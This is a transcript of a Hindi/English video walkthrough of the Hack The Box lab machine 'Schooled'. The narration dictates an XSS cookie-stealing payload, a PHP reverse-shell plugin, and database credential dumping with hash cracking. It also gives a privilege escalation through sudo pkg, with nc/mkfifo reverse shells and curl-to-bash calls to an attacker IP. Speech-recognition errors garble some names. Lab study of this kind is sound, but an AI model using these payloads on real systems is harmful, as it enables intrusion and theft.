तो हेलो गाइस, आज के टाइम हम लोग बात करेंगे स्कूलेड मशीन के बारे में जो कि होस्टेड है हैक द बॉक्स पे एंड जो कि 30 पॉइंट्स की मशीन है विच इज़ अ मीडियम रैंक्ड मशीन। सो वीडियो में आगे बढ़ने से पहले अगर आपने हमारे चैनल को अब तक सब्सक्राइब नहीं कर रखा तो चैनल को सब्सक्राइब कर लीजिए। साथ ही साथ डिस्कॉर्ड भी ज्वाइन कर लीजिएगा क्योंकि हमारे आने वाले हर एक वीडियो की अपडेट डिस्कॉर्ड पर आपको मिलती रहेगी। एंड साथ ही साथ कोर्सेज भी चेकआउट कर लो क्योंकि काफ़ी इंटरेस्टिंग से कोर्सेज हम लोग लॉन्च कर रहे हैं एंड आपको उनकी लिंक डिस्क्रिप्शन में मिल जाएगी। साथ ही साथ आप हमारे वेबसाइट पे जाके शॉप सेक्शन में उसे चेक कर सकते हो। सो विदाउट वेस्टिंग इन मोर टाइम, आई एम ब्लैक हैमर, यू आर वॉचिंग द डार्क टेक। सो लेट्स स्टेप इनटू इट। ओके, सो ये रहा हमारा आईपी। आई विल कॉपी दिस वन एंड जल्दी से ओपन कर लेते हैं हम हमारा टर्मिनल। सो मैंने ऑलरेडी उसे स्प्लिट कर रखा है। यू कैन सी अवर आईपी दैट इज़ 10 10 10 15 1। तो मैंने एन मैप भी ऑलरेडी कर रखा है, तो आई जस्ट शो यू द एन मैप फाइल। आई डू अ लेस एन मैप and as you can see there is two ports open, 22 and 80. So obviously our way to go will be the 80 port. So I'll quit this one and I'll do a go buster and let's start the virtual host scanning on the schooled.htb. Until then we'll go to the schooled.htb for some research. So as you can see, this is basically a school's website. You can see school education system, and if you scroll further, nothing more that about section and all, and these all buttons are dead. These are just testimonials, Jacques Phillips and all. So let's skip them. Here if you go into the about us, there is again the mission vision history and the same thing as we had on the home page. So let's go into the teachers, and here is something interesting. This is the list of teachers which is going to be helpful in the later on. So here is the Leanne Carter and who is manager, Manuel Phillips who is the mathematics teacher, Jim Ibrahim and Jane Hygens. So basically these are all their staff, and let's check what we had in the this GoBuster scan. So we have a moodle.schooler.htb. So quickly add this thing into the host file. So I'll do a nano /etc /hosts. I'll do a control S /etc /host. So you can see I added moodle.schooler.htb already. So I'll go and get here moodle.schooler.htb and I'll allow a redirect. So you can see it is redirect us to the Moodle directory, and here are all the available courses like mathematics, science research and information and all blah blah blah. So I'll just go into login and I'll create an account. So let's go. Username qwert quert and the password will be qwert@123 and email will be like I'll do something like this, and you can see they have a very specific ending for the email. It have to be schooled like student.schooled.htb. So I'll show you, and I'll select a random country and create account. So you can see once again invalid dot df. Okay, dot hg. So you can see the ending should be student.schooled.htb. So we will do student.chooled.htb. Copy this one and paste it over here. Now we'll create an account and soon we will be on the dashboard. I'll hit don't save, continue, and it will greet us with a good dashboard. So in the site home you can see the multiple courses. I'll go and get into the mathematics and enroll me here. So after doing enroll me, in the announcement section you can see that there is an announcement called reminder for joining student, which will basically ask you to fill the MoodleNet profile set. So here they are saying that I will be checking all the students who enrolled for this course for the MoodleNet profiles. So basically when we fill the MoodleNet profiles, this Manuel Phillips is going to check them. So we can perform the access there for grabbing the cookies obviously. So we can take over the account. This is basically using the Moodle, I guess. Yeah, let's check where. Yeah, so LMS is the Moodle. So basically LMS has this vulnerability of account takeover. I'll show you. We will basically do this image src equals to x, and on error equals to this dot source equals to double quote http colon double slash 10.10.15.1 slash question mark c equals and single quote complete. We will do a plus document dot cookie and brace complete. So I'll just copy and I'll start the server here. I'll do python -3 and on 80. So python -m http.server on 80 and hit enter. So server is started and I'll hit submit. As I did the update profile, until then I'll clear the pub. What we have in the repeater proxy, everything is fine. Let's see, in the terminal we have a cookie. So it is basically our cookie. I'll show you p5 inspect element storage, and it is starting with p5 again. So we just have to wait for manual Phillips to open that particular profile of us. I'll just close this. I'll go to the site home and wait for the cookie to appear here. Until then we will search for the exploit. So I'll go here and Moodle exploits, and you can see the exploit db post shouting over here, open me. So I'll go and let's see, we have two sites. I'll send it here and I'll send this URL here. So let's let them load, check. Okay, so we have a cookie here. I'll just copy it, Ctrl Shift C, and I'll go and paste this. I'll replace it with mine. So you can see I'll change the cookie, and now notice it over here. We have our username. I'll refresh this one and I'll refresh this. So suddenly we changed to the manual Phillips. So we had successfully taken over the account. So we will go to that post over here, and it looks like the CVE. So it looks like the Python script. It says maybe someone needs Python scripts, therefore I have written it to exploit. Okay. And there is also a video POC over here. How can you take over the account? So basically Moodle lets you to increase your permissions by taking over the account. So if you have the manager, you can take over the administrator account, and so on. So there is also a RC file which is going to be handy later on. And let's check another post, and this looks like the same post, same Python file as before. So yeah, it takes the cookie and username. So it is basically allowing you to do some things if you have the cookie. Okay, so let's get back and let's see. For we go into the dashboard. Let's check our courses, and we will go into the mathematics one. So it should load quickly. It's taking a bit load, and we are here in the mathematics. Let's check for the participants. Okay, so let's enroll a user. So let's see if we can enroll the manager. So here is Leanne Carter. Why we are enrolling this Leanne Carter? Because by using this Moodle we can access their profiles if anyone is enrolled in your course. So Moodle basically lets you access their profiles. So I'll just send this to the burp and make sure interceptor is on. Okay, and I'll do the enroll user. I'll send this to the repeater, forward and forward again. So we should see one user enrolled. I'll forward and one user enrolled. So I'll go into the L, forward again, and I'll just turn off the proxy. So you can see Leanne Carter, and role is basically the students. So we will change it. We'll go into the repeater, extend it, and let's check our ID. So I'll go into the manual Philips and profile. So we have an ID of 24. I'll close this one. Let's change this 25 to 24 and let's set roll assign to the 1. So that is highest roll possible. So I'll do the send and error is nothing, count is 1. So let's refresh this page and see if we change anything here or not. So okay, so manager is assigned to the Leanne Carter now. I'll open up the profile and as you can see there is administration section. So I'll just go and log in as and I'll hit continue. Now we have a site administration added over here and you can see manual Philips, you are logged in as Leanne Carter. So I'll go into the users and users permission and define roles. So we will change the manager permission because we have that permission right now. So you don't have to do anything, just scroll all the way down, turn your proxy to the burp suite down and you have to select the edit. Now just go into the proxy, do the forward and come back. Here in the burp you can see it is loading. I'll let it load for a bit and I'll forward this packet too. So you can see we can now edit it and you just have to hit this save changes button and just go to the browser and here we have the payload for the full permissions. Just hit it and copy. So I'll copy the whole. Now as I copied this, I'll hit Ctrl C and let's go back to the burp and replace this with our payload with full permissions. So this zeros, all zeros will be replaced with 1, nothing else. So you can see everything is 1. So all permission is granted and we will just forward this request. So now you can see we will be granted with all the permissions. So I'll just change the proxy to the normal and let it load for a bit and now we have all the permissions. So let's go into the site administration once more and now we will be able to upload the plugins. So let's go into the plugins and install the plugin. So for that we need to go for the remote code execution and here. So okay, so it is opened up and there is a rc.zip file. So I'll go into the code, copy this one and I'll close the burp for now. So let's go back to the terminal and rm moodle -r moodle rc and I'll just do the git clone over here. As we cloned it, ls cd moodle.rc moodles_rc, I'll do a ls and unzip rc.zip. So if you do a ls, you need to go to the cd rc lang en and ls. So if you do the less block rce, you can see it is basically a php shell command, so you can replace it with yourself. So just go on into the browser and copy the pentest monkeys reverse shell. So I'll just do a cp // I have that over here // php reverse shell and enter. So as you can see ls, I'll remove the block rc.php and I'll move this one to the block rc.php. If I do less block rc.php now, so you can see this is a basically a shell by the pentest monkey. So php reverse shell, I'll do the nano and block rc. I'll change the IP to hours 10.10.15.1 and port will be our significant one 1337. I'll save Ctrl X cd space // and as we are in the Moodle RC again, we have to zip this file again. So let's do the like rm rc.zip. Now we will have to zip this RC folder. So as we made changes, we must zip this, because as you can see, while installing plugin, it asks for the zip package. So I'll just do zip -r rc.zip, and the output folder output file name, that is rc.zip, and rc, that is folder we want to zip. I'll hit enter. If I do ls, you can see rc.zip over here. So let's control C and fire up the listener. So listener is started. On 1337, I'll go do the choose file, upload files, browse, and rc.zip, and upload this file. Install plugin, and it is installed. So as we are here is the trigger RC, because it is a PHP reverse shell. So in order to get the reverse shell in our terminal, we must trigger that. So we will go here, it says domain, that is basically our domain name. So I'll copy here, hit Ctrl C, open up new tab, and we have a http://moodle.schooled.htb, and I think if you can recall, there is a subdirectory called Moodle where we got redirected to. So I'll hit Moodle and I'll paste this. So now I'll remove this double slash and hit enter. So it is taking a bit load, means it is executing, and we have a shell here. So if I do ls, we are in the slash. If I do pwd, we are in the slash. So let's get into the config directory of this one. So I'll go into the cd/user/local/cd www ls. We have Apache 24, cd Apache 24 ls, and we have Moodle data. Let's do a cd ls, and we have Apache 24. Okay, so cd Apache 24 ls, we have a data folder here. So I'll hit cd data ls. There is Moodle cd Moodle, and I'll hit ls again. So we have a let's see, we have a config.php. So I'll basically do cat config.php. I'll hit enter. So here we are. We have the SQL credentials in that, so I'll just copy them, Ctrl Shift C, and I'll paste them here. So I'll split this terminal horizontally, and I'll open up the nano and temp. I'll paste them here for the temporary purpose. So let's check the SQL. So MySQL, it's nothing working. So let's check the which MySQL. So it doesn't returns any result either. So let's check the $path. So bin, user bin, so user local bin is not added over here. So let's check for the ls /user /bin user /local /bin, and I'll grep for MySQL. So we have MySQL in this directory. So we have to use the absolute path in order to execute the commands. So let's make the command. So /user /local /bin /MySQL, and our user will be Moodle, and let's see our what we have, our password. So -p, our password will be this one. So I'll copy this, paste this over here. We have the database name, so I'll refer it by capital D, and it is going to be the Moodle again. And I'll use -e to execute the commands, single quotes, and let's see, we have the database name. So let's check for the tables. So I'll do a check table, show tables, and semicolon. So I'll copy this command and paste it over here. So we can see all the databases are database tables are written over here. So let's find something juicy called users. So we have the users, So let's check for DESC MDL user. Let's check the description. I'll hit DESC MDL underscore user and copy this. Again we have ID field, auth field, username, password. These two will be useful, and last login, URL, nothing else. So we will select username comma password from MDL underscore user semicolon, and I'll copy this command and paste it again. So you can see bunch of users returned, and there is also a quote user that we used. So hygiene Jane, Ellen Matthew, blah blah blah. So looks like they all are solving the machine. So we will currently focus on the admin. So I'll copy this. I'll do a Control Shift C, and I'll do cd dot dot rm hash and nano hash. Let's separate them with colon, and we will crack them using John. So I'll do Control S, Control X, and John hash hyphen w, and our word list, that is rocky.txt. I'll hit enter, and loaded one password hash, no password hash left to crack. So let's check for the password. So I'll hit John hyphen hyphen show. So I already cracked the password, that's why it is showing no password left to crack. So we have the password here, and let's terminate this session and go into the SSH. So now, so by checking the home directory, we know there is a Jimmy user, and on the Moodle itself there is a teacher called Jimmy. So we will just SSH into that, try doing SSH Jimmy @school@.htb, and with this password. So I'll do a Control Shift C and Control Shift V, hit enter, and we have the Jimmy @school@.htb. So we'll do ls cat user.txt and enter. We have the user flag. Let's copy it and submit it right away. Submit flag, paste a medium machine and submit. So it says error, something went wrong. I'll submit it here. Okay, congratulations, school-ed user is now owned. So user is completed. Let's get back to the root. So I'll do a sudo space -l. So as we can see, we can use pkg update and pkg install command. So basically we can use them using sudo. So let's check. I'll close this all. I don't think we need that anymore. So creating custom packages on Freebsd. So by that we have this first post which shows us how to create the packages using packages in FreeBSD, as this one is running the FreeBSD operating system. And as you can see, we have to add this header, and then this is basically the metadata section ending of the file, and then this is the last step. So let's go and copy it. I'll do Control X, and no, I'll do the nano ex.sh. Okay, so we will do here nano exploit ex.sh. So I'll go copy the header, basically this one. I'll copy and paste it over here. I'll hit enter, and let's copy the metadata. I'll paste it again, and let's create the line at the end for building the package. I'll drag it a little bit down so every line will be visible. Now we have these functions like pre-install, pre-install and post-install. So these are basically used to if we are writing some commands in pre-install, then they will be executed before the installation. They are defined to make sure you have all the repositories up to date as per your requirements, or like you have to place any folder on the any location for the installation purpose. So that's why post install and pre-install could be used. So we will just copy one of them like this, and let's hit enter, and I'll paste this over here. Hit delete, and let's call it summoning root shell, and we don't need this one. We can execute bash commands directly over here. So I'll change the package name for ease here. Let's call it black hammer, and let's go to the bash. So we'll go to the GT for beans and copy the reverse shell command. So hit copy, go to the root shell again and paste it over here. We don't need this exec, and our IP port. Our host will be 10.10.15.1 and our port is going to be 1337. I'll do the NC, I'll make it here NC and 1337 now. So everything is set. I'll just hit Ctrl S, Ctrl X, and let's transfer it. I'll do the Python HTTP server on 123 and drag it here. So let's do wget. So wget is not here basically, so I'll do the curl http://10.10.15.1:123/ex.sh and put it into the exploit.sh. So everything is ready. I'll hit enter. We got the 200 OK response. Let's do the cat ex.sh exploit.sh to see everything is correct. Okay, I'll do the chmod +x and exploit.sh. Let's execute it /exploit.sh, enter, and it says unable to open plist file temp stage plist. So let's try making some changes in the exploit.sh. I'll hit nano exploit.sh and let's remove this bash-c and this single quotes again, because we are executing it as bash, so I don't think we will need them. One and delete. So I'll hit Ctrl S, Ctrl X and exploit.sh again. So again that one. So looks like we have to pipe that. So let's change our payload a little bit. I'll hit exploit nano exploit.sh and let's this a little bit complicated. So we will do a cat /temp/a and pipe it to the bash, as well as we will do no, not like that, /bin/bash -i, that is interactive, and we will send 2 into the okay let's see 2 into the &1 and then nc 10.10.15.1 space 1337 and we will do a -e over here. So looks like we are executing the bash and then sending it to the our 1337. Okay, so now just let's pipe it again to the temp and a. So basically we are creating a tunnel later on with in the directory temp with the name a. So let's go and pipe it. Okay, so just we will send the output into the /temp/a, and to make sure that doesn't exist before, so we will do a rm/temp/a semicolon and mkfifo/temp/a. So mkfifo will basically use to make a temporary tunnel. So I'll save this one, Control S, Control X, and let's try executing it. So it says unable to open plist file again. Okay, so let's find out another way how to exploit privilege escalation using PKG. So we have PKG GTF for beans. It says make temp -d. It runs command using specially crafted Freebsd package, generate it with fpm and upload it to the target. So let's check this one, Control C. Let's try this one. I'll do a Control C here, and yeah, let's execute it over here. Stop this server for a little bit and Control Shift V. Now let's copy this, Control C, and we don't need ID, we need to execute the bash reverse shell. So basically I'll do the curl, I'll let him do the curl as curl is present over there, http://10.10.15.1 and :123 slash root.sh and pipe it to the bash. So in root.sh we will write our bash reverse shell code. So let's save this here, hit enter, and let's run this. Control C, Alt Tab, Control Shift V. So apt-get install fpm reading packages list. It says unable to install fpm. Let's see, it is install created package and path is over here. So when I do the ls, there is txz. So let's go and upload it on here. So let's see how to download download file using curl, and how to download a file using curl Linux command line. So grab the files with curl, run. Okay, so it says directly grab the file. Downloading files with curl -o will be there. Okay, so let's see, we'll do a curl. I'll start the Python server again here, and but before that we need to write the code for that. So as we executed this command, yeah, so it basically says curl the root.sh from the and execute it with the bash. So let's do the nano root.sh, hit enter. We'll go to the gtfo beans, gtfo beans.io, and here for the bash. Copy this, Control C, let's go back and Control Shift V. We don't need exec. Our host will be 10.10.15.1 and port will be 1337. I'll hit control. We don't need this because we are executing it with bash already. I'll close this one too. I'll hit Control S and Control X. So let's start the server, and here we will do curl http://10.10.15.1 : I'll copy this file name, Control Shift C, Control Shift V, and hyphen O will be Control Shift V again. So let's see the file is received, and then we will do a sudo -l, and we can do a pkg install. So I'll do a copy sudo paste and -no -repo -update and space. Let's see, we have X, and hit enter. So proceed with this installation, yes, and we got the root shell over here. So let's do the ID, we have the root, and let's do a cd ls and cat root.txt. So I'll copy the flag and submit it right away. So let's talk about one more easy way to own the root. I'll just do the Control C and cat root.sh. Now we will do a make what was that command, apt, yeah, this, and then instead of doing curl we can just enter it like this. We will copy this one, Control Shift C and Control Shift V. So now this command will be directly executed instead of making it complicated. I'll show you the more simple way, and now we will just build the package by using fpm, and I hit enter. So it says file already exists, so I'll do a rm x and fpm install. So we have the file over here. I'll remove the first one, rm x, and enter, and run the curl command again as the I'll run the curl command again as the names are same. So we can see failed the command. Okay, I'll start the HTTP server and now hit enter. So file is transferred. Let's do the ls, and you can see there is the file. So let's do again sudo. The command is already over here. So sudo pkg install no repo update, and this is 1. So I'll hit enter. It says do you want to install, I'll say yes, and pre-install script failed. So looks like we got the root here, so I'll do it again. Yes, basically got executed over here. We can see the root address school aid, but it doesn't seems like sending the reverse connection. So anyways, we got the root over here. You can just this is how we can root the box. Basically you can host a file, it could be of any name. In my case that is root.sh, and it contains the reverse shell command that is for connecting back to my this listener. And what this x where that file is, okay, so basically this x:1.0 file is doing the curl request to my IP on the port 123 and the root.sh. So basically we know that the curl will be basically used to get the contents of the file. So it will get the contents of the file, that is you can see the reverse shell contents, and execute them by using bash. So in another words, the root shell of the schoolhead will be executing the reverse shell command. So it will connect back to our listener we hosted. So as you can see, that's all for today's video. If you like this video, make sure you subscribe the channel and hit the bell icon for your notifications, and make sure to check our courses as well.